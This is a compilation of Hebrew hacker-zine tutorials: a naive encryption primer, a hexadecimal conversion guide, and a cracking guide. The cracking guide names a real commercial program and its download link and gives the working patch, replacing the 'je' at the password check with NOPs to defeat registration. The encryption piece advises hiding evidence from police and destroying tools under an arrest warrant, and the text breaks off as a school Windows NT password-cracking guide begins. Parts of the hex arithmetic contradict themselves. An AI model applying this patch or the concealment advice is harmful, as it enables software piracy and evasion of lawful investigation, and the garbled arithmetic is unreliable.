‫היא קבעה שכל אות בפה שלה תהיה משהו אחר‪:‬‬
‫‪ a‬תהיה בשפה שלה ‪,3‬‬
‫‪ b‬תהיה בשפה שלה ‪,6‬‬
‫‪ c‬תהיה בשפה שלה ‪,9‬‬
‫‪ d‬תהיה בשפה שלה ‪.12‬‬
‫אז איך היא תכתוב ‪ ? abcd‬היא תכתוב את זה ככה ‪.36912 :‬‬
‫זה לא חייב להיות ככה אבל זה בעצם הבסיס‪.‬‬
‫הצפנה הוא שינוי המקור אבל לא שינוי מלא‪ ,‬שינוי התוכן‪ ,‬התסרת התוכן ע"י תווים מוזרים‪.‬‬
‫כאשר אתה תפתח קובץ מוצפן כזה או אחר אתה תראה דבר שאתה לא תידע מהזה‪,‬‬
‫אתה תחשוב אולי שזה קובץ לא גמור‪ ,‬הרוס‪ ,‬סתם חירבוש אבל זה לא נכון‪.‬‬
‫דוגמא ‪ :‬זה טקסט שראיתי ברשת והוא היה מוצפן‪ ,‬תגידו לי מה הבנתם ממנו‪...‬‬
‫‪-------------------------------------------------------‬‬
‫‪.kasfona sfknasf sdifh@w#$)&@#$jtk wdrgp vsmv sdpog v12‬‬
‫‪-------------------------------------------------------‬‬
‫עכשיו מצאתי את סוג ההצפנה ופיצחתי את זה‪ ,‬רוצים לדעת מה יש בפנים ?‬
‫‪-------------------------------------------------------‬‬
‫‪.decrypt -> kasfona sfknasf sdifh@w#$)&@#$jtk wdrgp vsmv sdpog v12‬‬
‫‪.undecrypt -> its a very simple program to decrypt, i think u can do it‬‬
‫‪-------------------------------------------------------‬‬
‫נו מה הבנתם מזה ?‬
‫* הצפנה זה דבר נחמד‪ ,‬אבל רק כשאתה משתמש בו‪.‬‬
‫* לא קשה לפענח הצפנה רק צריך כלים טובים‪.‬‬
‫אני מקווה שהבנתם פה את הכללי ובואו נמשיך‪.‬‬
‫==================‬
‫איך אני מצפין ?!?!‬
‫==================‬
‫אוקי יש שתי דרכים שלדעתי הם עיקריות להצפין‪....‬‬

‫‪ .1‬לכתוב תוכנה שמצפינה את הכל לפני איך שאתה קובע (בתנאי שאתה כתבת אותה)‪.‬‬
‫‪ .2‬להשתמש בתוכנה אשר מישהו כבר כתב‪ ,‬רק שתדעו רוב התוכנות עושות את זה עם סיסמא‪.‬‬
‫אתה צריך לכתוב את הסיסמא הנכונה כדי שזה יפתח את ההצפנה‪.‬‬
‫הסברים‪:‬‬
‫‪ .1‬אם אתם כותבים תוכנה שמצפינה‪ ,‬איך היא צריכה להיות ?‬

‫אתה מגזיר למחשב שיבדוק איפה הוא מאתר את התתוים הבאים‪:‬‬
‫‪.*&^%$#@!+-.,abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789‬‬
‫ואז פשוט מאוד הוא מחליף אותם במה שאתם קובעים‪ ,‬למשל תקבעו ש ‪ a‬יהיה ‪ z‬הוא יעשה את זה‪.‬‬
‫&& אם תם רוצים לכתוב תוכנה שפותחת הצפנה שאתם עשיתי אז עושים ההיפך‪:‬‬
‫אתה מגזיר למחשב שיבדוק איפה הוא מאתר את התתוים האלה שנתת לו לשנות את התתוים‬
‫הרגילים‪.‬‬
‫למשל אמרת ש ‪ a‬זה ‪ ,z‬אז אתה אומר שכשהוא יראה ‪ z‬הוא ישנה את זה ‪.a‬‬
‫‪ .2‬אתם מחפשים תוכנה באינטרנט‪ ,‬אתם פותחים קובץ טקסט כלשהו ולוחצים על ‪,decrypt‬‬
‫הוא מבקש מכם סיסמא שתם קובעים‪ ,‬אתם מקישים ומאשרים‪ ,‬לאחר מכן הוא יוציא לכן קשקוש‬
‫אמיתי‪.‬‬
‫ועם אתה רוצים לפתוח את זה אתם לוחצים על ‪ ,undecrypt‬הוא מבקש סיסמא‪.‬‬
‫אם אתם מקישים את הנכונה יופי‪ ,‬אם לא אכלתם אותה‪.‬‬
‫אוקי אם תרצו לבדוק את זה לבד‪ ,‬תורידו או תבנו תוכנת קידוד והצפנה ותנסו‪ ,‬אם אתם לא‬
‫מאמינים לי ;=)‪.‬‬
‫============‬
‫למה זה טוב ?‬
‫============‬
‫זה משמ טוב להרבה דברים‪ ,‬כי זה בעצם מסמל את הפרטיות של כל הבני אדם‪.‬‬
‫בטוח קראתם את הכתבה שלי על ה ‪ fbi‬והציתות באתר של הארגון אז זה בעצם מנפץ את זה‪.‬‬
‫למשל יש לכם טקסט סודי ממש סודי ‪ ,‬על כל הדברים הלא טובים שעשיתם‪ ,‬הבולשת עושה פשיטה‪,‬‬
‫מוציאה את המחשב מוצאת הקובץ ‪ ,‬ולא מצליחה לפצח אותו‪ ....‬לא קרה כלום לא נדפקת ולא כלום‪.‬‬
‫אבל יש פה בעיה קטנה‪ ...‬שאם תעבדו אם תוכנה שכבר כתובה יש סיכוי שאיזה פלצן בבולשת יגלה‬
‫אותה‬
‫ויפתח את הקובץ בלי בעיות אז אכלצם אותה‪ .‬אז מה אני מעייץ ?‬
‫לכתוב תוכנה לבד‪ ,‬לשים שם את הקידוד הכי נוראי שאפשר (מבחינה טובה) שאף אחד לא ידע‪.‬‬
‫שיהיה לך איפשהו כמו מין מפת תווים שתידע מה זה מה‪.‬‬
‫אחרי שאתה מכין תוכנה ואתה בסכנה (יש לך תיק ‪ ,‬צו מעצר) אני מייעץ למחוק את התוכנה‪,‬‬
‫כדי שלא יהיה להם איך לפתוח את הקובץ ואל תפיץ אותה כי אתה מגדיל סיכוי להידפק‪.‬‬
‫תקעו איפשהו מפת תווים שתידעו אחרי איך לכתוב תוכנה אנטי‪ ,‬שתפתח את ההצפנה‪.‬‬
‫זה טוב לעוד דברים‪:‬‬
‫‪ .1‬להסתיר מידע סודי עליכם או על מישהו אחר‪.‬‬
‫‪ .2‬כתבתם מכתב אהבה לילדה ואתם לא רוצים שיראו אותו עד שתשלח לה אותו (איזה חמוד ‪. )):‬‬
‫‪ .3‬גנבתם מבחן מהמחשב בבית ספר ולא רוצים שיגלו אותכם בבית‪ ,‬וואלה‪.‬‬
‫ועוד הרבה הרבה דברים אחרים‪.‬‬
‫=====================‬
‫בטוח שלא יגלו את זה ?‬
‫=====================‬
‫תשמעו אני לא יכול להבטיח שלא יגלו את זה ‪ ,‬זה תלוי איך כתבתם ובאיכות של התוכנה‪.‬‬
‫אם תכתבו תוכנה שלוקחת אות ומזיזה אותה תו אחד בטווח זה לא טוב‪ ,‬למשל אמרת ש ‪ b‬יהפוך ל ‪.c‬‬
‫זה ממש קל לגלות אבל אם משהו אחר‪ ,‬תנסו לעשות את זה כמה שיותר מסובך ורחוק בטווח‪.‬‬
‫למשל ש ‪ a‬יהיה ‪ w‬או משהו כזה‪.‬‬
‫אני לא יכול שוב להבטיח שלא יגלו מה בפנים‪ ,‬כמו שאני לא יכול להבטיח שלא יפרצו לכם למחשב‬
‫מתישהו או שלא יתפסו אתכם אם תפרצו לאתר‪ ,‬לא תמיד יתפסו אבל אני ואף אחד אחר לא יכול‬
‫להבטיח‬
‫שלא‪.‬‬
‫מבינים מה אני אומר‪ ,‬זה עניין של סיכון‪.‬‬
‫לדעתי האישית תעבדו רק אם תוכנות שאתם כתבתם‪ ,‬ואם יש לכם בעיות אז קחו את התוכנה שיש‬
‫למטה‪,‬‬
‫ותשנה את המבנה שלה‪.‬‬
‫אבל בחיים‪ ,‬אבל בחיים אם אתם יודעים שיש סיכוי שאיזה שוטר יבוא לקחת את המחשב שלכם‬
‫איזה יום‪,‬‬
‫אל תשתמשו בתוכנות כתובות ותוכנות דפוקות‪.‬‬
‫========‬
‫לינקים ‪.‬‬
‫========‬
‫אתרים על קידוד והצפנה אפשר למצוא בכל חור ברשת‪ ,‬אבל מה מיוחד בטקסט שלי ‪? 9-:‬‬
‫אני נותן לכם פה קישור לתוכנה שהיא בעצם תוכנת הצפנה‪ ,‬שנכתבה ע"י בן אדם מאוד חכם (לא אני)‪.‬‬
‫אז אם אתם רוצים קחו אותה‪ ,‬תקמפלו אותה ותבלו איתה‪.‬‬
‫כל זאת כמה לינקים לכיף ‪:‬‬
‫‪www.astalavista.com‬‬
‫‪hack.box.sk‬‬
‫‪blacksun.box.sk‬‬
‫‪by pirs[i]ng‬‬
‫בסיס הקסדצימלי ‪ -‬המרה‬
‫מאת ‪zeos :‬‬

‫במדריך זה תלמד איך להמיר מבסיס הקסדצימלי לעשרוני ולהפך ‪ .‬לא סיפור גדול ‪ ,‬אבל חשוב שתדע‬
‫כדי לבצע דברים מורכבים יותר בעתיד‪ .‬המדריך הזה הוא רק חלק ממדריך ענק של בסיס‬
‫הקסדצימלי שאני ימשיך להכין אם יהיה לי כוח ‪):‬‬
‫}מדריך זה נכתב לצורכי לימוד בלבד ‪ -‬האחריות לשימושו עלייך בלבד {‬
‫יאללה!‬
‫מה זה הקסדצימלי ?‬
‫הקסדצימלי הוא בסיס ‪ ,16‬מה זה בסיס אתה שואל ובכן בסיס הוא הגורם שאותו מעלים בחזקה‪ .‬אני‬
‫יודע שאני קצת סוטה מהנושא אבל בצורה מתמטית פשוטה בסיס זה כמו ה ‪ x‬כאן ‪ xa :‬וה ‪ a‬הוא‬
‫המעריך שלו ‪ .‬אז כן אם הבנת נכון ‪ -‬הקסדצימלי הוא בסיס ‪ 16‬ו ה‪ a-‬הוא המעריך שלו‪ ,‬תלמד‬
‫חזקות ושוב לפה‪.‬‬
‫אוקיי פירוש למילה הקסדצימלי (‪ )hexadecimal‬הוא בעצם מיוונית ‪ hexa -‬שזה ‪ 6‬ו ‪ decimal‬שזה‬
‫‪ - 10‬דצימלי הוא הבסיס המוכר לכולנו ‪ -‬בסיס ‪ , 10‬עשרוני‪ .‬וכמו כן יש גם את הבסיס בינארי ‪ -‬בסיס‬
‫‪ 2‬שהוא הבסיס הבסיסי ביותר ומשתמשים בו בגלל העובדה שמחשב יכול לקלוט רק אותות חשמליים‬
‫של כבוי ודלוק ולכן ‪ 0‬ו ‪ 1‬שהם המספרים היחידים בבסיס זה מועברים למחשב‪ .‬בבסיס ה‬
‫הקסדצימלי משתמשים כדי לשנות פקודות ועוד דברים משום העובדה שהוא נוח לעבודה דרך שפת‬
‫סף (אסמבלר) כי רוב הפקודות בה מתורגמות למספרים הקסדצימליים פשוטים יחסית (עוד פרטים‬
‫במדריך אסמבלר) ‪.‬‬
‫שיטות ספירה‬
‫טוב ‪ ,‬עכשיו נכון שכאשר אתה סופר רגיל אתה סופר כך ‪:‬‬
‫‪... 10 ,9 ,8 ,7 ,6 ,5 ,4 ,3 ,2 , 1‬‬
‫זאת שיטת הספירה המקובלת הנקראת גם השיטה העשרונית או הדצימלית‪.‬‬
‫אוקיי עכשיו למה הבלטתי את ‪ 9‬ו ‪ ! ? 10‬זאת משום שבנקודה הזאת בעצם המספר מקבל עוד ספרה‬
‫מצד שמאל ומתאפס מחדש‪ .‬כך גם בבסיס הקסדצימלי ‪ .‬כמו שבעשרוני אנו סופרים עד ‪ 9‬ואז‬
‫מוסיפים לעשרות ‪ 1‬ומאפסים את היחידות (וזאת משום שמבחינה תיאורטית אין כזה דבר "עשר‬
‫אחדות" אלא יש "אחד עשרות") ‪.‬‬
‫בקיצור ‪ ,‬בהקסדצימלי זה דומה ‪ -‬אתה סופר עד ‪ 15‬ואז מוסיף אחד לספרה שמאלית רק‬
‫שבהקסדצימלי הספרה השמאלית שווה לכפולות של ‪ 16‬ולא לכפולות של ‪.10‬‬
‫לא הבנת ‪ ,‬לא נורא עוד מעט תבין‪ .‬עכשיו בהקסדצימלי סופרים עד ‪ 9‬כרגיל ואז מ ‪ 10‬ועד ‪ 15‬ישנם‬
‫אותיות כדלקמן‪:‬‬
‫עשרוני ‪ -‬הקסדצימלי‬
‫‪1-1‬‬
‫‪2-2‬‬
‫‪3-3‬‬
‫‪4-4‬‬
‫‪5-5‬‬
‫‪6-6‬‬
‫‪7-7‬‬
‫‪8-8‬‬
‫‪9-9‬‬
‫‪a - 10‬‬
‫‪b - 11‬‬
‫‪c - 12‬‬
‫‪d - 13‬‬
‫‪e - 14‬‬
‫‪f - 15‬‬
‫‪!let the game begin‬‬

‫נגיד שהבנת איך זה הולך אז בוא נתחיל להמיר מ הקסדצימלי לעשרוני כי זה יותר קל‪.‬‬
‫טוב הסתכל בטבלה הבאה שמייצגת את המספר ‪ 12‬בבסיס הרגיל (עשרוני) ‪:‬‬
‫‪2‬‬ ‫‪1‬‬
‫‪1‬‬ ‫‪10‬‬ ‫‪100‬‬ ‫‪1000‬‬ ‫‪10000‬‬ ‫‪100000‬‬ ‫‪1000000‬‬
‫כמו שבוודאי הספקת להבין בטבלה הזאת מוצג המספר ‪ 12‬כאשר הוא מחולק ל ‪ 1‬עשרות ועוד ‪2‬‬
‫יחידות ‪ ,‬פשוט וקל ‪ .‬וכן גם שים לב שככל שהולכים בטבלה התחתונה שמאלה כך גם נכפל המספר‬
‫בעשר ‪ ,‬כלומר שכל מספר הוא כפולה של עשר בעצמו ‪ -‬חזקה שלו ‪ .‬ככה ש ‪ 1‬זה עשר בחזקת ‪ 0‬ועשר‬
‫זה עשר בחזקת אחד ‪ ,‬ומאה זה עשר בחזקת ‪. 2‬‬
‫אותו סיפור גם בהקסדצימלי ‪:‬‬
‫‪1‬‬ ‫‪16‬‬ ‫‪256‬‬ ‫‪4096‬‬ ‫‪65536‬‬
‫נגיד וננסה לכתוב את המספר בהקסדצימלי (שים לב ש ‪ 12‬הוא ‪ c‬לפי הטבלה למעלה) זה אמור‬
‫להראות כך‪:‬‬
‫‪c‬‬
‫‪1‬‬ ‫‪16‬‬ ‫‪256‬‬ ‫‪4096‬‬ ‫‪65536‬‬
‫כי בעצם כופלים אותו בעצמו‪.‬‬
‫בוא נלך על מספר טיפה יותר גדול ‪ :‬המספר ‪ 2a‬שבעשרוני זה ‪44‬‬
‫למה? בוא ותראה ‪ ,‬בעצם אפשר לחלק את ‪ 2a‬ככה ‪:‬‬
‫‪a‬‬ ‫‪2‬‬
‫‪1‬‬ ‫‪16‬‬ ‫‪256‬‬ ‫‪4096‬‬ ‫‪65536‬‬
‫אז מה בעצם יש כאן ? בשביל לקבל את התוצאה מה נעשה בדיוק כפי שעושים בעשרוני ‪ -‬ניקח את ‪12‬‬
‫הקודם זה בעצם ‪ 10 * 1‬ועוד ‪. 1 * 2‬‬
‫אז פה המספר ‪ 2a‬זה יהיה ‪ 16 * 2‬שזה ‪ 32‬ועוד ‪ a * 1 - a‬זה בעצם ‪10‬‬
‫אז זה שווה ל ‪ 10 * 1‬כלומר ‪ 10 + 32 :‬שזה שווה ל ‪42‬‬
‫מסובך ? אולי השרטוט הזה יעזור לך ‪:‬‬
‫ניקח את ‪ 42‬בעשרוני ונגלה שהוא שווה ל‪:‬‬
‫‪40 = 10 * 4‬‬
‫‪2=1*2‬‬
‫‪42 = 2 + 40‬‬
‫עכשיו ניקח את ‪ 2a‬בהקסדצימלי ונגלה שהוא שווה ל‪:‬‬

‫‪32 = 16 * 2‬‬
‫‪ - a = 10‬לפי הטבלה‬
‫‪10 = 1 * 10‬‬
‫‪42 = 10 + 32‬‬
‫בוא וקח דוגמאות אחרות ‪:‬‬

‫‪= 86a‬‬
‫‪a * 1 = 10‬‬
‫‪96 = 16 * 6‬‬
‫‪2048 = 256 * 8‬‬
‫‪2154 = 2048 + 96 + 10‬‬
‫כלומר ‪86a = 2154 :‬‬
‫‪4c91‬‬
‫‪1=1*1‬‬
‫‪144 = 16 * 9‬‬
‫‪c * 256 = 3072‬‬
‫‪16384 = 4096 * 4‬‬
‫‪19601 = 16384 + 3072 + 144 +1‬‬
‫כלומר ‪4c91 = 19601‬‬
‫המרה מעשרוני להקסדצימלי‬

‫עכשיו העסק אמור להיות קל אם הבנת את החלק שלמעלה ועברת את כיתה ג' ‪:‬‬
‫בשביל להמיר מעשרוני להקסדצימלי מה שעושים זה פשוט‪ ,‬לחלק את המספר ב ‪ , 16‬למה ב‪?16 -‬‬
‫עקרון ההמרה שיוסבר כאן הוא פשוט פירוק ספרות ולאחר מכן שרשור שלהם ביחד ( "לחבר" אותם ‪-‬‬
‫נגיד ‪ 1‬ו ‪ 2‬יהפכו להיות ‪ , ) 12‬בסדר נחזור למספר ‪ 12‬העשרוני שלנו‪:‬‬
‫תחלק אותו ב ‪ 10-‬ותקבל‬
‫‪)2(1 = 10 / 12‬‬
‫‪)1( 0 = 10 / 1‬‬
‫בסדר‪ 99% ...‬שלא הבנת כלום ‪ ,‬מה שקורה למעלה הוא בדיוק מה שהסברתי ‪ -‬פירוק המספר‬
‫והשארית שלו היא המספר עצמו ‪....‬‬
‫‪ 12‬חלקי ‪ 10‬קיבלת ‪ 1‬ושארית ‪ 2‬מה שניתן לתרגום כ ‪ 1‬עשרות ו ‪ 2‬יחידות‬
‫לאחר מכן "שמרת" את ה‪ 2 -‬זאת השארית וחלקת את ה ‪ 1‬שקיבלת שחילקת ב ‪ 10‬ממקודם וקיבלת ‪0‬‬
‫ושארית של ‪ 1‬מה שאומר ‪ 1‬עשרות‪.‬‬
‫‪ 2‬יחידות ו ‪ 1‬עשרות ‪12 -‬‬
‫די מסובך להסביר את זה ככה‪ ...‬אם לא הבנת ככה הנה עוד שיטה ‪ :‬בעצם בהמרה עשרונית אתה‬
‫מחלק‬
‫ב ‪ 0 1-‬עד שאתה מקבל במספר ‪ 0‬ובשארית את המספר שחילקת עליו בעשר (‪ 1‬במקרה שלנו) ואז כל‬
‫פעם שאתה מחלק את השארית אתה שומר וממשיך לחלק וכל מספר שמתווסף אתה מחבר משמאל‬
‫למספר כך שקיבלת בהתחלה בשארית ‪ 2‬ואחר כך ‪ - 1‬שרשר אותם (לשים אותם אחד ליד השני)‬
‫ותקבל ‪12‬‬
‫אוקיי איך הדבר עובד בבסיס ‪? 16‬‬

‫נגיד המספר העשרוני הבא ‪22 :‬‬
‫מה נעשה אתו ? בדיוק מה שעשינו בעשרוני רק שעכשיו נחלק ב ‪ 16‬ולא ב‪!10 -‬‬
‫‪)6( 1 = 16 / 22‬‬
‫‪)1( 0 = 16 / 1‬‬
‫אוקיי ‪ 6‬ו ‪ - 1-‬שרשר וקיבלת ‪16‬‬
‫דוגמית אחרת ‪58 :‬‬

‫‪)10( 3 = 16 / 58‬‬
‫‪)3( 0 =16 / 3‬‬
‫‪ 10‬בהקסדצימלי זה ‪ a‬מה שיתקבל בסוף הוא ‪3a‬‬
‫דבר חשוב מאוד למי שמשתמש במחשבון כאשר תנסה לחלק ‪ 58‬ב ‪ 16‬תקבל ‪ 3.625‬או בשברים ‪ 3‬ו ‪5‬‬
‫חלקי ‪ , 8‬עכשיו תשים לב שכאשר אתה מחפש את השארית כדי לכתוב אותה בצורה עשרונית אתה‬
‫חייב להפוך את המכנה ל ‪ 16‬מה שבמקרה שלנו לכפול את המכנה והמונה של ‪ 5‬חלקי ‪ 8‬ב ‪ 2-‬ואז‬
‫תקבל ‪ 10‬חלקי ‪ . 16‬וזאת התשובה לשארית ולא ‪.5‬‬
‫לידע כללי ‪ ,‬העיקרון פועל גם בעשרוני כי הרי נגיד שאתה רוצה לכתוב את השבר חצי (‪ 1‬חלקי ‪) 2‬‬
‫בעשרוני כאשר הוא תחת בסיס עשר‪ ,‬אז אתה חייב לכפול את המונה והמכנה ב ‪( 5 -‬כי ‪ 5 * 2‬שווה ל‬
‫‪ ) 10‬ואז אתה מקבל ‪ 0.5‬אותו דבר בדיוק קורה גם ב הקסדצימלי כי אתה חייב "לכתוב את המספר"‬
‫תחת בסיס ‪ 16‬ולא תחת בסיס אחר‪.‬‬
‫דברי סיכום‪:‬‬
‫במדריך זה למדת (אם הצלחת) איך להמיר מבסיס ‪ 10‬לבסיס ‪ 16‬ולהפך‪ .‬אני יודע שזה לא סיפור גדול‬
‫אבל אתה תראה שזה יכול להשתלם לך אם תחליט ללמוד אסמבלר באופן מלא ‪,‬כמובן שאפשר פשוט‬
‫להשתמש בממיר בסיסים שניתן להוריד כמעט מכל מקום אבל אפילו המפצחים המנוסים ביותר‬
‫נוהגים יותר להתעסק עם זה לבד כי זה יותר מאתגר כנראה וגם כמו שכתוב בהתחלה זה בסיס‬
‫לדברים יותר מורכבים‪.‬‬
‫במדריך הבא שלי (על הקסה) אכתוב כיצד ניתן לחבר ‪ ,‬לחסר לכפול או לחלק מספרים מבסיס ‪16‬‬
‫‪( .‬ותלמד גם על חשיבות המספרים השליליים והמשלימים ל ‪( 2‬המדריך מסתמך על ידע בבסיס בינארי‬
‫‪by zeos‬‬
‫המדריך לפיצוח מעשי של הגנת סיסמא‬
‫מאת‪zeos :‬‬
‫שלום לכם‪ ,‬זהו כבר המדריך השני שאני כותב בנוגע לקראקינג ‪ .‬בעקבות הודעות שהשאירו לי בפורום‬
‫בנוגע לפיצוח הגנת סיסמא החלטתי לכתוב את מדריך זה וכן גם בשביל שממש תוכל להתנסות ולפצח‬
‫תוכנית אמיתית‪.‬‬
‫הערה‪ :‬המדריך נוצר לצורכי לימוד בלבד! ‪ ,‬כל פעולה לא חוקית שתעשה או כל נזק שיגרם למחשבך‬
‫עקב כל פעילות על סמך המדריך הנה על אחריותך בלבד!‪ ,‬המדריך מוסבר בצורה תיאורטית וכל‬
‫פעולה לא חוקית שתנקוט כתוצאה מכל סוג של שימוש הנה על אחריותך האישית בלבד‪ .‬אם אתה‬
‫מעוניין לנצל את הפיצוח למטרות רווח אנא הפסק לקרוא‪.‬‬
‫חלק ‪ - 1‬הכלים והידע‬

‫טוב ‪ ,‬אז למדריך הזה אתה חייב (!) ידע באסמבלי ‪ ,‬בלי ידע אתה תתקע‪ ...‬עדיף שתלמד מספרים או‬
‫באינטרנט קצת ואז חזור לכאן (רק ידע בסיסי למדריך זה ‪ ,‬עדיף שתדע קצת על אוגרים‪ ,‬פונקציות‬
‫השוואה ובסיסים)‪.‬‬
‫הכלים שנשתמש הם כלים די נפוצים‪:‬‬
‫‪ w32.1‬דיסאמבלר מעולה חובה בכל בית בישראל ‪):‬‬
‫‪ )hworks )hex workshop.2‬עורך הקסדצימלי (מציג את הקבצים בבסיס ‪ )16‬אם אתה יודע‬
‫להשתמש טוב בכל עורך אחר‪ ,‬בבקשה‪.‬‬
‫ניתן להשיג את הקבצים כמעט בכל מקום באינטרנט‪...‬‬
‫חלק ‪ - 2‬המטרה‬
‫בשביל שלא יהיה קשה ‪ ,‬סיירתי באתרי קראקינג ומצאתי קובץ די נפוץ שמלמדים עליו איך לפרוץ ‪.‬‬
‫תוכנה ממש קלה וחביבה שלמפצח הבינוני לא צריך לקחת יותר מ ‪ 5‬דקות לפצח‪.‬‬
‫לתוכנה קוראים ‪ sweet little piano :‬וניתן להוריד אותה מהכתובת הבאה‬
‫‪http://www.ronimusic.com/swlipi32.zip‬‬
‫חלק ‪ - 2‬בדיקת הודעות מערכת‬
‫קדימה לעבודה! ‪ ,‬אחרי שהרצנו את התוכנה לראשונה נפתחו לנו ‪ 2‬דברים ‪ :‬בהתחלה תיבת הודעה‬
‫שאומרת ‪:‬‬
‫‪note! you must supply your user id when ordering‬‬
‫‪user id: xxxx‬‬
‫ש ‪ xxxx‬הוא המספר רשיון שלך‪ .‬אחרי שתלחץ על ‪ ok‬יפתח לך מסמך ‪ order.txt‬וכן גם תיבה‬
‫המבקשת את הסיסמא שלך שבה רשום בכותרת "‪ ”enter your password‬ומקום להכניס‬
‫סיסמא‪ .‬הקש משהו שטותי כל מספר שעולה על דעתך ואמורה להיפתח לך הודעת שגיאה (כמה לא‬
‫מפתיע) שבה רשום‬
‫‪ not a valid password‬ובכותרת רשום‬
‫‪user id xxxx sweet little piano -‬‬
‫הקלק על ‪ ok‬שוב ותכנס לגרסה הלא מלאה של התוכנית‪.‬‬
‫אז מה היה לנו כאן ‪:‬‬
‫התוכנית פתחה לך מקום לרשום סיסמא בהתאם למספר זיהוי שהונפק לך (‪ )user id‬ולאחר מכן‬
‫להשוות באמצעות אלגוריתם מסוים את הסיסמא למספר זיהוי ‪ ,‬אך אתה שמת מספר לא נכון‬
‫וקיבלת הודעת שגיאה ‪.‬‬
‫חלק ‪ - 3‬בודקים את הקוד‬

‫טוב ‪ ,‬בוא נראה מה קורה בתוך התוכנית‪ :‬פתח את ‪ w32‬ופתח בו את קובץ ה ‪ exe‬של התוכנית‪...‬הנה‬
‫אחת הסיבות למה בחרתי דווקא את התוכנית הזאת ‪ -‬היא קטנה מה שאומר שכנראה יהיה לנו פחות‬
)‫ (ליד הכפתור של ההדפסה‬strn.ref ‫ בוא נלחץ על‬- ‫ עכשיו קלטו מה נעשה‬. ): ‫בלגן להתעסק וזה טוב‬
not a valid :‫ונחפש את השורה שמראה לנו כי הבדיקה לא נכונה כלומר את המשפט‬
password
:‫מצאנו? יופי לחצו עליו ואמור להיפתח לכם משהו כזה‬
* reference to: user32.getdlgitemtexta, ord:0000h

|
:00401e54 e8ebba0000 call 0040d944
:00401e59 e83efeffff call 00401c9c
:00401e5e 85c0 test eax, eax
:00401e60 741e je 00401e80
:00401e62 6a30 push 00000030
1possible stringdata ref from data obj ->”sweet little piano”

|
:00401e64 68fce14000 push 0040e1fc
1possible stringdata ref from data obj ->”thanks for registering!”

|
:00401e69 68ade14000 push 0040e1ad
:00401e6e 53 push ebx
1reference to: user32.messageboxa, ord:0000h

|
:00401e6f e812bb0000 call 0040d986
:00401e74 c70568e2400001000000 mov dword ptr [0040e268], 00000001
:00401e7e eb1a jmp 00401e9a
1referenced by a (u)nconditional or ©onditional jump at address:

|:00401e60©
|
:00401e80 6a30 push 00000030
1possible stringdata ref from data obj ->”sweet little piano”

|
:00401e82 68fce14000 push 0040e1fc
1possible stringdata ref from data obj ->”not a valid password!”

|
:00401e87 68e3e14000 push 0040e1e3
:00401e8c 53 push ebx
‫ אז בוא ותראה מה‬, ‫אחרי שהתאוששת מהבלגן הזה והצלחת למצוא את הקטעים עליהם אני מדבר‬
‫ לפי השיגרה‬:‫קורה לנו פה‬
* reference to: user32.getdlgitemtexta, ord:0000h
‫|‬
‫‪:00401e54 e8ebba0000‬‬ ‫}קריאה לפונקציה { ‪call 0040d944‬‬
‫‪:00401e59 e83efeffff‬‬ ‫} קריאה לפונקציה{ ‪call 00401c9c‬‬
‫‪:00401e5e 85c0‬‬ ‫}מבחן השוואה( ‪test eax, eax‬‬
‫‪:00401e60 741e‬‬ ‫} !קפיצה אם שווה{ ‪je 00401e80‬‬
‫‪00401e62 6a30‬‬ ‫‪push 00000030:‬‬
‫ישנם ‪ 4‬משפטים ‪ ,‬משפטים אחד ושתיים קוראים לפונקציה ‪ ,‬לא מעניין‪ .‬משפט שלישי עורך מבחן‬
‫מסוים בין שני האוגרים ‪ eax‬אבל זה לא כל כך משנה לנו כי זה פיצוח אלגוריתם של הסיסמה ואנחנו‬
‫לא מתעסקים עם זה כעת ואילו במשפט הרביעי (מסומן בירוק) ישנה קפיצה אם שווה ‪ -‬זה ‪ je‬לשיגרה‬
‫שאומרת כי ההרשמה הצליחה‪ .‬עכשיו בוא נחשוב ‪ ,‬מה היה קורה אילו התוכנית הייתה עושה מבחן‬
‫השוואה והפקודה ‪ je‬לא הייתה שם? אז התוכנית הייתה נרשמת בהצלחה‪ .‬אז יאללה קדימה בוא נלך‬
‫ונשמיד אותה!!!!‬
‫חלק ‪ - 4‬נטרול פקודת ההשוואה‬

‫אם קראת את המדריך הראשון שלי תראה כי גם פה אני מנטרל את פקודת ההשוואה באמצעות‬
‫פקודת ‪nop‬‬
‫= ‪ , no operation‬אבל יש בעיה קטנטנה ומעצבנת שפקודת ‪ je‬תופסת שני בתים ופקודת ‪nop‬‬
‫תופסת בייט אחד ‪ ,‬ולכן נכניס רק ‪ 2‬פקודות ‪ nop‬ולא ארבע כמו שעשינו במדריך הקודם‪.‬‬
‫שים לב לטיפשות של המתכנת ‪ ):‬שעשה "מספר סידורי" כדי שתתבלבל ולא תמצא את השיגרה‪,‬‬
‫אל תדאג אם מספרי השורות בדיסאמבלר שלך לא שוות למה ששלי‪ ...‬פשוט עקוב אחרי משפטי‬
‫התוכנית שבראש (מסומנים בכחול) ותמצא אותם בהתאם ל"מספר סידורי" שלך‪.‬‬
‫אז בדוק ב ‪w32‬שלך את המספר ‪ offset‬של הפקודה ‪ je‬שלך (שוב פעם‪ ,‬אל תתייחס אם זה לא דומה‬
‫לשלי) ולאחר שרשמת אותו (ללא ה ‪ ) h -‬לך לעורך ההקסדצימלי שלנו ‪. hworks‬‬
‫קדימה קפוץ לשורה באמצעות פקודת ‪( goto‬אלט ו‪ ) f5‬אל המספר שרשמת והקלד פעמיים ‪( 90‬זאת‬
‫הפקודה ‪ nop‬בהקסדצימלי) ‪ .‬שמור את הקובץ‪...‬‬
‫חלק ‪ - 5‬פיצחתי ! פיצחתי!! אני גבר!!!‬

‫תפעיל את התוכנית ואם עשית הכל נכון תראה שלא משנה איזה מספר תקיש ההרשמה תהיה חוקית‪.‬‬
‫מזל טוב ‪ ,‬אני אישית גאה בך שפיצחת את התוכנית הראשונה שלך ‪ -‬רוץ בכל הבית ותצעק "פיצחתי !‬
‫פיצחתי!" כמו שאני עשיתי בפעם הראשונה שהצלחתי ‪):‬‬
‫אם אתה רוצה להמשיך ולהיות מפצח אתה חייב לדעת שחלק מהיותך מפצח זה ללמוד שפות תכנות‬
‫שונות‪ ,‬למד ככל שתוכל ואז תוכל לקבל שליטה על כל מה שמתבצע בתוך תוכנית מכל סוג ומכל שפה‬
‫ולנתב אותה לפי רצונך וזאת בעצם התכלית של הקראקינג‪.‬‬
‫מקווה שנהנית מהמדריך ‪zeos -‬‬

‫פריצת סיסמאות ב‪windows nt‬‬
‫אהלן!‬
‫‪ e-man‬כאן‪.‬‬
‫אז מה?‬
‫בית ספר החליט להתקין ‪ ?winnt‬יופי‪ ...‬שיחנקו אייתו‪.‬‬
‫והכי טוב שאתם תחנקו אותם נכון?‬
